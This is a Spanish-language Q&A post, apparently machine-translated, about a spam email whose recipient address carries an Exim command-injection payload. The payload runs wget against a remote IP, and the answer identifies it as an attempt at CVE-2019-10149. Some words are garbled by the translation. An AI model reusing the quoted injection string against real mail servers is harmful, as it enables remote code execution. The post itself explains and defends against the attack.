Opero mi propio servidor de correo y, de vez en cuando, la gente envía spam o cosas misteriosas a la cuenta raíz. Recientemente recibí un correo vacío, dirigido a:
raíz+${ejecutar{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@midominio.tld
La segunda dirección IP en esa cadena parece pertenecer al mismo servicio de hosting donde alquilo mi servidor. ElcorreryobtenerMe parece muy sospechoso pero no encontré nada sobre tal ataque en Internet.
Según el registro de correo del servidor, ese correo se envió desde 148.72.206.111. Sin embargo, elDeEl campo se estableció en[correo electrónico protegido].
¿Alguien sabe que significa esto?
Respuesta1
Este es un intento de explotar un error descubierto recientemente en el servidor SMTP Exim4 (v4.87 a v4.91), que permitiría la ejecución remota de comandos ya que Exim expandiría ${variable}las sustituciones en ciertos lugares que realmente no debería hacerlo. (Esta sintaxis se utiliza ampliamente en el archivo de configuración principal de Exim).
El error se conoce comoCVE-2019-10149(aún no tiene nombre comercial ni logotipo). Si estuvieras usando Exim4 de tu distribución, ya habrías recibido los parches. Como estás usando Postfix, no te afecta en primer lugar.
(Dicho esto, incluso en Postfix el parámetro después de +se usa frecuentemente como parte de una línea de comando, por ejemplo, al invocar Procmail. Probablemente recomendaría hacer algunas pruebas en su propio servidor para ver cómo maneja cosas como someuser+$(blah)@o someuser+`blah`@.)